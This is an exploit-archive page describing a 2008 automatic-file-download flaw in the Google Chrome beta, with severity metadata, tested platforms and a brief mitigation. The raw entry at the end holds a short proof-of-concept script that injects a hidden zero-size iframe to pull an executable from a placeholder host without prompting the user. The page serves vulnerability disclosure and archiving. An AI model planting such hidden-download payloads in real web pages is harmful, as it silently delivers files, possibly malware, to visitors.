header-logo
Suggest Exploit
vendor:
Chrome
by:
nerex
7.5
CVSS
HIGH
Automatic File Download
20
CWE
Product Name: Chrome
Affected Version From: Google Chrome (BETA)
Affected Version To: Google Chrome (BETA)
Patch Exists: YES
Related CWE: N/A
CPE: a:google:chrome
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows Vista SP1, Windows XP SP3
2008

Google Chrome Automatic File Download Vulnerability

Google Chrome allows files (e.g., executables) to be automatically downloaded to the user's computer without any user prompt. This proof-of-concept was created for educational purposes only. Tested on Windows Vista SP1 and Windows XP SP3 with Google Chrome (BETA).

Mitigation:

Disable automatic file downloads in Google Chrome settings.
Source

Exploit-DB raw data:

***************************************************************************
 Author: nerex
 E-mail: nerex[at]live[dot]com

 Google's new Web browser (Chrome) allows files (e.g., executables) to be automatically
 downloaded to the user's computer without any user prompt.

 This proof-of-concept was created for educational purposes only.
 Use the code it at your own risk.
 The author will not be responsible for any damages.

 Tested on Windows Vista SP1 and Windows XP SP3 with Google Chrome (BETA)
**************************************************************************
<script>
document.write('<iframe src="http://www.example.com/hello.exe" frameborder="0" width="0" height="0">');
</script>

# milw0rm.com [2008-09-03]